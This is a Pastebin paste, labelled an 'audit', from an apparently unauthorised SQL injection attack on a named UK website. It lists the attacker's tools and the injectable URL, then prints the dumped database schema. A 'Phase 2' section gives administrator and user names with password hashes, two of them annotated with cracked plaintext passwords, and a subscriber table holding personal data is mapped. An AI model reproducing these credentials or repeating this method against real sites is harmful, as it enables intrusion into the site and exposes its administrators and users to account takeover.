API tools faq
paste
Advertisement
CyberVX

Audit [abslatin]

CyberVX
Mar 29th, 2019
439
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.24 KB | None | 0 0
raw download clone embed print report
  1. Auditor: CyberVX
  2.  
  3. - OS:
  4. # Kali Linux;
  5.  
  6. - TOOLS:
  7. # NMAP;
  8. # SQLMAP WITH HASH DECRYPTER DEFAULT METHOD WITH SUFIX;
  9. # MACCHANGER;
  10. # XPROBE2;
  11. # JOHN THE RIPPER;
  12. # JSQL;
  13. # VPN BOOK;
  14.  
  15. TOOLS SUPPORT:
  16. # https://hashkiller.co.uk/md5-decrypter.aspx
  17. # http://techcens.com/admin-page-finder-online/
  18. # https://crackstation.net/
  19. # https://www.onlinehashcrack.com/
  20. # https://hashkiller.co.uk/md5-decrypter.aspx
  21.  
  22. - VULNERABILITY:
  23. # SQL INJECTION;
  24. # INSECURE CRYPTOGRAPHIC STORAGE;
  25. # FAILURE TO RESTRICT URL ACESS;
  26.  
  27. - TARGET:
  28. # http://www.abslatin.co.uk
  29. # http://www.abslatin.co.uk/node.php?id=16
  30.  
  31. ========================
  32. REPORT 1
  33. ========================
  34.  
  35. Database: db312892314
  36. Table: album
  37. [3 columns]
  38. +------------+--------------+
  39. | Column | Type |
  40. +------------+--------------+
  41. | IdAlbum | int(11) |
  42. | ImageAlbum | varchar(200) |
  43. | NameAlbum | varchar(300) |
  44. +------------+--------------+
  45.  
  46. Database: db312892314
  47. Table: p_suscriptors
  48. [4 columns]
  49. +----------------+--------------+
  50. | Column | Type |
  51. +----------------+--------------+
  52. | IdSuscriptor | int(11) |
  53. | MailSuscriptor | varchar(300) |
  54. | Name | varchar(100) |
  55. | Nationality | varchar(100) |
  56. +----------------+--------------+
  57.  
  58. Database: db312892314
  59. Table: p_album
  60. [3 columns]
  61. +------------+--------------+
  62. | Column | Type |
  63. +------------+--------------+
  64. | IdAlbum | int(11) |
  65. | ImageAlbum | varchar(200) |
  66. | NameAlbum | varchar(300) |
  67. +------------+--------------+
  68.  
  69. Database: db312892314
  70. Table: p_links
  71. [4 columns]
  72. +-------------+---------------+
  73. | Column | Type |
  74. +-------------+---------------+
  75. | CommentLink | varchar(1000) |
  76. | IdLink | int(11) |
  77. | NameLink | varchar(200) |
  78. | URL | varchar(500) |
  79. +-------------+---------------+
  80.  
  81. Database: db312892314
  82. Table: links
  83. [4 columns]
  84. +-------------+---------------+
  85. | Column | Type |
  86. +-------------+---------------+
  87. | CommentLink | varchar(1000) |
  88. | IdLink | int(11) |
  89. | NameLink | varchar(200) |
  90. | URL | varchar(500) |
  91. +-------------+---------------+
  92.  
  93. Database: db312892314
  94. Table: p_events
  95. [10 columns]
  96. +-----------------+--------------+
  97. | Column | Type |
  98. +-----------------+--------------+
  99. | DateEvent | datetime |
  100. | FeaturesEvent | longtext |
  101. | FinishTimeEvent | time |
  102. | FrontPage | int(11) |
  103. | Hidden | int(11) |
  104. | IdEvent | int(11) |
  105. | ImageMin | varchar(200) |
  106. | NameEvent | varchar(500) |
  107. | PlaceEvent | varchar(500) |
  108. | StartTimeEvent | time |
  109. +-----------------+--------------+
  110.  
  111. Database: db312892314
  112. Table: p_salsa
  113. [6 columns]
  114. +------------+--------------+
  115. | Column | Type |
  116. +------------+--------------+
  117. | Content | blob |
  118. | DateTime | datetime |
  119. | IdSalsa | int(11) |
  120. | Image | varchar(200) |
  121. | PreContent | varchar(500) |
  122. | TitleSalsa | varchar(100) |
  123. +------------+--------------+
  124.  
  125. Database: db312892314
  126. Table: p_news
  127. [8 columns]
  128. +------------+--------------+
  129. | Column | Type |
  130. +------------+--------------+
  131. | Content | text |
  132. | DateTime | datetime |
  133. | FrontPage | int(11) |
  134. | Hidden | int(11) |
  135. | IdNew | int(11) |
  136. | ImageMin | varchar(200) |
  137. | PreContent | varchar(500) |
  138. | TitleNew | varchar(500) |
  139. +------------+--------------+
  140.  
  141. Database: db312892314
  142. Table: gallery
  143. [5 columns]
  144. +------------+--------------+
  145. | Column | Type |
  146. +------------+--------------+
  147. | footprint | varchar(200) |
  148. | IdAlbum | int(11) |
  149. | IdPhoto | int(11) |
  150. | ImageMin | varchar(200) |
  151. | ImageWhole | varchar(200) |
  152. +------------+--------------+
  153.  
  154. Database: db312892314
  155. Table: administrators
  156. [3 columns]
  157. +---------------+--------------+
  158. | Column | Type |
  159. +---------------+--------------+
  160. | id | int(11) |
  161. | user_name | varchar(255) |
  162. | user_password | varchar(60) |
  163. +---------------+--------------+
  164.  
  165. Database: db312892314
  166. Table: p_gallery
  167. [5 columns]
  168. +------------+--------------+
  169. | Column | Type |
  170. +------------+--------------+
  171. | footprint | varchar(200) |
  172. | IdAlbum | int(11) |
  173. | IdPhoto | int(11) |
  174. | ImageMin | varchar(200) |
  175. | ImageWhole | varchar(200) |
  176. +------------+--------------+
  177.  
  178. Database: db312892314
  179. Table: events
  180. [10 columns]
  181. +-----------------+--------------+
  182. | Column | Type |
  183. +-----------------+--------------+
  184. | DateEvent | date |
  185. | FeaturesEvent | text |
  186. | FinishTimeEvent | time |
  187. | FrontPage | tinyint(1) |
  188. | Hidden | tinyint(1) |
  189. | IdEvent | int(11) |
  190. | ImageMin | varchar(200) |
  191. | NameEvent | varchar(500) |
  192. | PlaceEvent | varchar(500) |
  193. | StartTimeEvent | time |
  194. +-----------------+--------------+
  195.  
  196. Database: db312892314
  197. Table: suscriptors
  198. [4 columns]
  199. +----------------+--------------+
  200. | Column | Type |
  201. +----------------+--------------+
  202. | IdSuscriptor | int(11) |
  203. | MailSuscriptor | varchar(300) |
  204. | Name | varchar(100) |
  205. | Nationality | varchar(100) |
  206. +----------------+--------------+
  207.  
  208. Database: db312892314
  209. Table: videos
  210. [3 columns]
  211. +------------+---------------+
  212. | Column | Type |
  213. +------------+---------------+
  214. | IdVideo | int(11) |
  215. | TitleVideo | varchar(500) |
  216. | URLVideo | varchar(1000) |
  217. +------------+---------------+
  218.  
  219. Database: db312892314
  220. Table: news
  221. [8 columns]
  222. +------------+--------------+
  223. | Column | Type |
  224. +------------+--------------+
  225. | Content | text |
  226. | DateTime | datetime |
  227. | FrontPage | tinyint(1) |
  228. | Hidden | tinyint(1) |
  229. | IdNew | int(11) |
  230. | ImageMin | varchar(200) |
  231. | PreContent | varchar(500) |
  232. | TitleNew | varchar(500) |
  233. +------------+--------------+
  234.  
  235. Database: db312892314
  236. Table: salsa
  237. [6 columns]
  238. +------------+--------------+
  239. | Column | Type |
  240. +------------+--------------+
  241. | Content | blob |
  242. | DateTime | datetime |
  243. | IdSalsa | int(11) |
  244. | Image | varchar(200) |
  245. | PreContent | varchar(500) |
  246. | TitleSalsa | varchar(100) |
  247. +------------+--------------+
  248.  
  249. Database: db312892314
  250. Table: p_categories
  251. [2 columns]
  252. +--------------+--------------+
  253. | Column | Type |
  254. +--------------+--------------+
  255. | IdCategory | int(11) |
  256. | NameCategory | varchar(200) |
  257. +--------------+--------------+
  258.  
  259. Database: db312892314
  260. Table: p_videos
  261. [3 columns]
  262. +------------+--------------+
  263. | Column | Type |
  264. +------------+--------------+
  265. | IdVideo | int(11) |
  266. | TitleVideo | varchar(100) |
  267. | URLVideo | varchar(500) |
  268. +------------+--------------+
  269.  
  270. Database: db312892314
  271. Table: p_products
  272. [11 columns]
  273. +-------------+--------------+
  274. | Column | Type |
  275. +-------------+--------------+
  276. | DateTime | datetime |
  277. | Features | varchar(500) |
  278. | FrontPage | int(11) |
  279. | Hidden | int(11) |
  280. | IdCategory | int(11) |
  281. | IdProduct | int(11) |
  282. | ImageMin | varchar(200) |
  283. | ImageWhole | varchar(200) |
  284. | NameProduct | varchar(100) |
  285. | Price | double |
  286. | Stock | int(11) |
  287. +-------------+--------------+
  288.  
  289. Database: db312892314
  290. Table: p_users
  291. [3 columns]
  292. +--------------+--------------+
  293. | Column | Type |
  294. +--------------+--------------+
  295. | IdUser | varchar(50) |
  296. | NameUser | varchar(100) |
  297. | PasswordUser | varchar(50) |
  298. +--------------+--------------+
  299.  
  300. Database: db312892314
  301. Table: users
  302. [3 columns]
  303. +--------------+--------------+
  304. | Column | Type |
  305. +--------------+--------------+
  306. | IdUser | varchar(50) |
  307. | NameUser | varchar(100) |
  308. | PasswordUser | varchar(50) |
  309. +--------------+--------------+
  310.  
  311. ===============================================================
  312. PHASE 2:
  313.  
  314. Database: db312892314
  315. Table: administrators
  316. [3 entries]
  317. +-----------+------------------------------------+
  318. | user_name | user_password |
  319. +-----------+------------------------------------+
  320. | admin | $P$Bstga7byV42vvh7WVT/pPFPZw6j7ET. |
  321. | annie | $P$BTUKe71XDGMYoJDlcc.6Nn72iIjPjU0 |
  322. | paul | $P$BgFBCcChouCvPmMIhKcHmnkwxBPCqB/ |
  323. +-----------+------------------------------------+
  324.  
  325. Database: db312892314
  326. Table: p_users
  327. [3 entries]
  328. +---------------+----------------------------------+
  329. | NameUser | PasswordUser |
  330. +---------------+----------------------------------+
  331. | Administrador | 0e4a20a448032584af3f285a2ad2d9d3 |
  332. | Annie | b18a7cf91d7ce5ec7c5bf54207ba7fdf |(anicita)
  333. | polla | 1ca13cec096718ac8ef09c57d9cd5d07 |(polla)
  334. +---------------+----------------------------------+
  335.  
  336. Database: db312892314
  337. Table: users
  338. [2 entries]
  339. +--------------------+----------------------------------+
  340. | NameUser | PasswordUser |
  341. +--------------------+----------------------------------+
  342. | AMAUTA CONSULTORES | 0e4a20a448032584af3f285a2ad2d9d3 |
  343. | Annie | c34d257b21c744ba5ed8d6863ee34b8e |
  344. +--------------------+----------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!